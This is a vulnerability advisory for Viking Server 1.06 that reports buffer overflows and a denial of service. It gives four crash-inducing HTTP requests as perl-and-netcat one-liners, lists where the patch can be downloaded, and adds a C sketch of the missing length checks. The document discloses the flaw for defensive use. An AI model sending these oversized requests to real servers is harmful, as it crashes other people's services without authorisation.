Vulnerability

    Viking

Affected

    Viking 1.06 build 355 and prior

Description

    Aviram Jenik found the following. Viking Server is a multi-protocol Internet server/proxy for Windows 95/NT that supports a wide range of protocols such as HTTP, FTP, SOCKS, DNS, TELNET, SMTP, POP3, UUCP, FCP, ICP, etc. Unfortunately, it does not perform proper buffer bounds checking, enabling attackers to launch a buffer overflow attack and possibly execute arbitrary code. Also, incorrect parsing of non-date data causes an exception, enabling remote attackers to cause a Denial of Service against the product.

    Any of the following HTTP commands will crash the server:

    (1) GET [x11765] HTTP/1.1<enter><enter>

        (Cmd: perl -e "print \"GET @{['x'x11765]} HTTP/1.1\n\n\""|nc 127.1 80)

    (2) GET / HTTP/1.1<enter>
        Unless-Modified-Since: [x14765]<enter><enter>

        (Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)

    (3) GET / HTTP/1.1<enter>
        If-Range: [x14765]<enter><enter>

        (Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{['x'x14765]}\n\n\""|nc 127.1 80)

    (4) GET / HTTP/1.1<enter>
        If-Modified-Since: [x14765]<enter><enter>

        (Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since: @{['x'x14765]}\n\n\""|nc 127.1 80)

Solution

    Viking 1.06 build 370 and above seems to be OK. Robtex has responded immediately and released a patch that deals with these issues. You can download the patch at:

        ftp://ftp.robtex.com/robtex/viking/beta/viking.zip
        http://www.robtex.com/files/viking/beta/viking.zip
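
The missing checks described above, shown as an added example (not Viking's or Robtex's code): the request URI and the three date-valued headers are length-checked before they are copied into fixed buffers, and a value that is not a date is ignored instead of raising an exception. The limits, status codes and function names are assumptions made for this sketch.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>
/* Limits are assumptions chosen for this example, not values taken from Viking. */
#define MAX_URI  2048
#define MAX_DATE 64
enum { REQ_OK = 200, REQ_BAD = 400, REQ_URI_TOO_LONG = 414, REQ_HDR_TOO_LARGE = 431 };
/* Date-valued headers named in the advisory. */
static const char *date_hdrs[] = { "If-Modified-Since", "Unless-Modified-Since", "If-Range" };
/* Accept only an RFC 1123 style date; every sscanf field is width-limited. */
static int parse_http_date(const char *v)
{
    char wd[4], mon[4]; int d, y, h, m, s;
    return sscanf(v, "%3[A-Za-z], %2d %3[A-Za-z] %4d %2d:%2d:%2d GMT",
                  wd, &d, mon, &y, &h, &m, &s) == 7;
}
/* Validate one GET request whose lines end in \n (as in the advisory's commands). */
/* *dates_ok receives the number of date headers that parsed as dates. */
int check_request(const char *req, int *dates_ok)
{
    char uri[MAX_URI + 1], val[MAX_DATE + 1];
    const char *eol = strchr(req, '\n');
    *dates_ok = 0;
    if (!eol || strncmp(req, "GET ", 4) != 0) return REQ_BAD;
    const char *u = req + 4, *sp = memchr(u, ' ', (size_t)(eol - u));
    if (!sp) return REQ_BAD;
    if ((size_t)(sp - u) > MAX_URI) return REQ_URI_TOO_LONG;  /* checked before the copy */
    memcpy(uri, u, (size_t)(sp - u)); uri[sp - u] = '\0';
    for (const char *ln = eol + 1; *ln && *ln != '\n'; ln = eol + 1) {
        if (!(eol = strchr(ln, '\n'))) return REQ_BAD;        /* unterminated header line */
        for (size_t i = 0; i < 3; i++) {
            size_t n = strlen(date_hdrs[i]);
            if ((size_t)(eol - ln) <= n || ln[n] != ':' || strncasecmp(ln, date_hdrs[i], n)) continue;
            const char *v = ln + n + 1;
            while (*v == ' ') v++;
            if ((size_t)(eol - v) > MAX_DATE) return REQ_HDR_TOO_LARGE;
            memcpy(val, v, (size_t)(eol - v)); val[eol - v] = '\0';
            *dates_ok += parse_http_date(val);                /* non-date data is ignored */
        }
    }
    return REQ_OK;
}
int main(void)
{
    int ok, rc = check_request("GET / HTTP/1.1\nIf-Range: not a date\n\n", &ok); /* constructed input */
    printf("status=%d dates_parsed=%d\n", rc, ok);
    return 0;
}
```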